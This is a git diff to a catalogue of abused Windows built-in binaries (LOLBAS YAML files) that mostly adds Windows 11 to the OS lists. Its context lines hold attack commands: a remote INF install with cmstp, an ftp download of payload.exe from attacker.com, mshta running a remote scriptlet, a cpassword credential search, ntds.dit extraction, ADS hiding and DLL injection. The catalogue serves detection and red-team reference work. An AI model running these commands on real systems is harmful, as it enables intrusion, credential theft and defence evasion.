Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\cmdl32.exe - Path: C:\Windows\SysWOW64\cmdl32.exe diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 0f00d4e..776397d 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.003 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 148aa25..ba8ae98 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -10,7 +10,7 @@ Commands: Category: ADS Privileges: User MitreID: T1218.002 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe @@ -23,7 +23,7 @@ Detection: - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - IOC: Control.exe executing files from alternate data streams - - IOC: Control.exe executing library file without cpl extension + - IOC: Control.exe executing library file without cpl extension - IOC: Suspicious network connections from control.exe Resources: - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index 44d7da9..5f2487e 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml @@ -10,14 +10,14 @@ Commands: Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: csc -target:library File.cs Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 7a09cee..c3fe1b4 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -10,7 +10,7 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe diff --git a/yml/OSBinaries/Desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml index 46fc551..ae8a566 100644 --- a/yml/OSBinaries/Desktopimgdownldr.yml +++ b/yml/OSBinaries/Desktopimgdownldr.yml @@ -10,7 +10,7 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\desktopimgdownldr.exe Code_Sample: diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 075e45a..745d27d 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -10,7 +10,7 @@ Commands: Category: AWL bypass Privileges: User MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index 6a3656a..4517e5c 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -10,42 +10,43 @@ Commands: Category: Copy Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. Usecase: Extract hidden file within alternate data streams Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o Description: Copies the source EXE to the destination EXE file Usecase: Use to copy files from one unc path to another Category: Download Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit Description: Copies a (locked) file using Volume Shadow Copy Usecase: Copy/extract a locked file such as the AD Database Category: Copy Privileges: Admin MitreID: T1003.003 - OperatingSystem: Windows 10, Windows 2016 Server, Windows 2019 Server + OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server + Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index 4574fe4..12364a9 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml @@ -10,21 +10,21 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat Description: Copies source file to destination. Usecase: Copies files from A to B Category: Copy Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat Description: Copies source file to destination Alternate Data Stream (ADS) Usecase: Copies files from A to B Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\Expand.exe - Path: C:\Windows\SysWOW64\Expand.exe diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index b38d467..9696d52 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: explorer.exe C:\Windows\System32\notepad.exe Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10 (Tested) + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index c50dec4..5bc026c 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index c2d5851..c267520 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -10,28 +10,28 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. Usecase: Extract data from cab file and hide it in an alternate data stream. Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt Description: Copy the source file to the destination file and overwrite it. Usecase: Download file from UNC/WEBDav Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe Description: Command for copying calc.exe to another folder Usecase: Copy file Category: Copy Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\extrac32.exe - Path: C:\Windows\SysWOW64\extrac32.exe diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 5f47e2f..7bbfa54 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -10,28 +10,28 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: findstr /S /I cpassword \\sysvol\policies\*.xml Description: Search for stored password in Group Policy files stored on SYSVOL. Usecase: Find credentials stored in cpassword attrbute Category: Credentials Privileges: User MitreID: T1552.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file. Usecase: Download/Copy file from webdav server Category: Download Privileges: User MitreID: T1185 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\findstr.exe - Path: C:\Windows\SysWOW64\findstr.exe diff --git a/yml/OSBinaries/FltMC.yml b/yml/OSBinaries/FltMC.yml index 8717c5b..45eebef 100644 --- a/yml/OSBinaries/FltMC.yml +++ b/yml/OSBinaries/FltMC.yml @@ -10,7 +10,7 @@ Commands: Category: ADS Privileges: Admin MitreID: T1562.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\fltMC.exe Code_Sample: diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index b8761ad..cc75117 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index c41136e..075846b 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" Description: Download Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\ftp.exe - Path: C:\Windows\SysWOW64\ftp.exe diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 53d547f..b04e7c4 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: Administrator MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: Gpscript /startup Description: Executes startup scripts configured in Group Policy Usecase: Add local group policy logon script to execute file and hide from defensive counter measures Category: Execute Privileges: Administrator MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index fcaf79f..714425a 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -10,14 +10,14 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: HH.exe c:\windows\system32\calc.exe Description: Executes calc.exe with HTML Help. Usecase: Execute process with HH.exe Category: Execute Privileges: User MitreID: T1218.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\hh.exe - Path: C:\Windows\SysWOW64\hh.exe diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml index 2401ae7..d39d734 100644 --- a/yml/OSBinaries/IMEWDBLD.yml +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -10,7 +10,7 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe Detection: diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index cec66ea..f5efdd3 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\ie4uinit.exe - Path: c:\windows\sysWOW64\ie4uinit.exe diff --git a/yml/OSBinaries/Ilasm.yml b/yml/OSBinaries/Ilasm.yml index 23bce1d..de74137 100644 --- a/yml/OSBinaries/Ilasm.yml +++ b/yml/OSBinaries/Ilasm.yml @@ -10,13 +10,14 @@ Commands: Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 7, Windows 10, Windows 11 - Command: ilasm.exe C:\public\test.txt /dll Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll Usecase: A description of the usecase Category: Compile Privileges: User MitreID: T1127 + OperatingSystem: Windows 7, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index 894317c..e28ba10 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 4314b56..6dc8ac7 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -10,14 +10,14 @@ Commands: Category: AWL bypass Privileges: User MitreID: T1218.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting Category: Execute Privileges: User MitreID: T1218.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index 57e8c83..9bfb036 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -10,14 +10,14 @@ Commands: Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: jsc.exe /t:library Library.js Description: Use jsc.exe to compile javascript code stored in Library.js and output Library.dll. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index 7776867..1672e45 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml @@ -10,21 +10,21 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Usecase: Hide data compressed into an alternate data stream Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab Description: Download and compresses the target file and stores it in the target file. Usecase: Download file and compress into a cab file Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\makecab.exe - Path: C:\Windows\SysWOW64\makecab.exe diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index a713768..dc20d90 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218.013 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Usecase: Inject dll file into running process Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index abb2597..5ef010d 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -10,14 +10,14 @@ Commands: Category: AWL bypass Privileges: User MitreID: T1127.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msbuild.exe project.csproj Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code Category: Execute Privileges: User MitreID: T1127.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msbuild.exe @sample.rsp Description: Executes Logger statements from rsp file Usecase: Execute DLL @@ -31,14 +31,14 @@ Commands: Category: Execute Privileges: User MitreID: T1127.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msbuild.exe project.proj Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Usecase: Execute project file that contains XslTransformation tag parameters Category: Execute Privileges: User MitreID: T1127.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe @@ -60,7 +60,7 @@ Detection: - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Msbuild.exe should not normally be executed on workstations Resources: - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index 7f65131..3a539b7 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting Category: AWL bypass Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 2f68ca7..2822620 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.005 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code @@ -24,7 +24,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.005 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: mshta.exe "C:\ads\file.txt:file.hta" Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code hidden in alternate data stream diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index c9bc676..867b990 100644 --- 